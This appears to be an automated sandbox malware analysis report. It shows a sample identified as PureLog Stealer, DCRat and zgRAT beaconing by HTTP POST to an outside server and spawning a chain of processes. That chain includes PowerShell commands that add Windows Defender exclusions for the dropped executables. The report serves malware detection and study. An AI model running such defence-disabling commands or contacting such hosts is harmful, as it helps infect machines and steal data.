Nov 5, 2024 23:54:38.048398018 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 861848cm.nyashkoon.ru
Content-Length: 1016
Expect: 100-continue
Nov 5, 2024 23:54:38.860486984 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:38.936009884 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 22:54:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 32 56 59 50
Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port
143 | 192.168.2.4 | 50150 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:39.059478045 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 861848cm.nyashkoon.ru
Content-Length: 1012
Expect: 100-continue
Connection: Keep-Alive
Nov 5, 2024 23:54:39.870655060 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:39.939196110 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 22:54:37 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 32 56 59 50
Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port
144 | 192.168.2.4 | 50151 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:40.061315060 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 861848cm.nyashkoon.ru
Content-Length: 1024
Expect: 100-continue
Connection: Keep-Alive
Nov 5, 2024 23:54:40.882237911 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:40.951447964 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 22:54:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 32 56 59 50
Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port
145 | 192.168.2.4 | 50152 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:41.078499079 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 861848cm.nyashkoon.ru
Content-Length: 1024
Expect: 100-continue
Connection: Keep-Alive
Nov 5, 2024 23:54:41.881203890 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:41.958250999 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 22:54:39 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 32 56 59 50
Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port
146 | 192.168.2.4 | 50153 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:42.096406937 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 861848cm.nyashkoon.ru
Content-Length: 1016
Expect: 100-continue
Connection: Keep-Alive
Nov 5, 2024 23:54:42.924674034 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port
147 | 192.168.2.4 | 50155 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:42.925092936 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 861848cm.nyashkoon.ru
Content-Length: 1024
Expect: 100-continue
Connection: Keep-Alive
Nov 5, 2024 23:54:43.736643076 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:43.808334112 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 22:54:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 32 56 59 50
Data Ascii: 2VYP


Session ID | Source IP | Source Port | Destination IP | Destination Port
148 | 192.168.2.4 | 50154 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:42.925092936 CET | 333 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 861848cm.nyashkoon.ru
Content-Length: 1284
Expect: 100-continue
Connection: Keep-Alive
Nov 5, 2024 23:54:43.747227907 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:43.826075077 CET | 308 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 22:54:41 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port
149 | 192.168.2.4 | 50156 | 37.44.238.250 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 23:54:43.945889950 CET | 309 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 861848cm.nyashkoon.ru
Content-Length: 1024
Expect: 100-continue
Nov 5, 2024 23:54:44.788541079 CET | 25 | IN | HTTP/1.1 100 Continue
Nov 5, 2024 23:54:44.868148088 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 22:54:42 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 32 56 59 50
Data Ascii: 2VYP


                                                                                            Target ID:0
                                                                                            Start time:17:52:02
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Users\user\Desktop\3AAyq819Vy.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\3AAyq819Vy.exe"
                                                                                            Imagebase:0xca0000
                                                                                            File size:2'041'114 bytes
                                                                                            MD5 hash:059DD6A8CB2D31871BB82DBB158965FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1725117408.0000000004D46000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1724034780.00000000063AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:17:52:03
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe"
                                                                                            Imagebase:0x4e0000
                                                                                            File size:147'456 bytes
                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:17:52:16
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\hyperContaineragent\CYWN6IDJqLBtl0YjSrMSw1hYURgrvXzRLx.bat" "
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:17:52:16
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:17:52:16
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\hyperContaineragent/Bridgecommon.exe"
                                                                                            Imagebase:0xf70000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1861446770.0000000000F72000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1943082141.0000000013491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperContaineragent\Bridgecommon.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 83%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:17:52:19
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline"
                                                                                            Imagebase:0x7ff6afa50000
                                                                                            File size:2'759'232 bytes
                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:17:52:19
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:17:52:19
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4DA.tmp" "c:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP"
                                                                                            Imagebase:0x7ff60d6c0000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:27
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe'
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:28
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe'
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:29
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:30
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe'
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:31
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\nFQRHbQjcuhfqIAubZpdQD.exe'
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:32
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:33
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe'
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:34
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:35
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\hyperContaineragent\Bridgecommon.exe'
                                                                                            Imagebase:0x7ff788560000
                                                                                            File size:452'608 bytes
                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:36
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:37
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:38
                                                                                            Start time:17:52:20
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:41
                                                                                            Start time:17:52:21
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat"
                                                                                            Imagebase:0x7ff7574a0000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:42
                                                                                            Start time:17:52:21
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:43
                                                                                            Start time:17:52:21
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Imagebase:0xdc0000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:44
                                                                                            Start time:17:52:22
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Imagebase:0x430000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:45
                                                                                            Start time:17:52:22
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\chcp.com
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:chcp 65001
                                                                                            Imagebase:0x7ff7211c0000
                                                                                            File size:14'848 bytes
                                                                                            MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:46
                                                                                            Start time:17:52:22
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                                            Imagebase:0xe00000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 83%, ReversingLabs
                                                                                            Has exited:true

                                                                                            Target ID:47
                                                                                            Start time:17:52:22
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                                            Imagebase:0x820000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:48
                                                                                            Start time:17:52:22
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\w32tm.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                            Imagebase:0x7ff7b79a0000
                                                                                            File size:108'032 bytes
                                                                                            MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:49
                                                                                            Start time:17:52:28
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                            Imagebase:0x7ff693ab0000
                                                                                            File size:496'640 bytes
                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:50
                                                                                            Start time:17:52:28
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                                            Imagebase:0x3d0000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 83%, ReversingLabs
                                                                                            Has exited:false

                                                                                            Target ID:51
                                                                                            Start time:17:52:31
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                            Imagebase:0x7ff6eef20000
                                                                                            File size:55'320 bytes
                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:52
                                                                                            Start time:17:52:32
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                                            Imagebase:0x60000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:53
                                                                                            Start time:17:52:41
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\hyperContaineragent\Bridgecommon.exe"
                                                                                            Imagebase:0xb60000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:54
                                                                                            Start time:17:52:49
                                                                                            Start date:05/11/2024
                                                                                            Path:C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe"
                                                                                            Imagebase:0xd90000
                                                                                            File size:1'719'296 bytes
                                                                                            MD5 hash:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:55
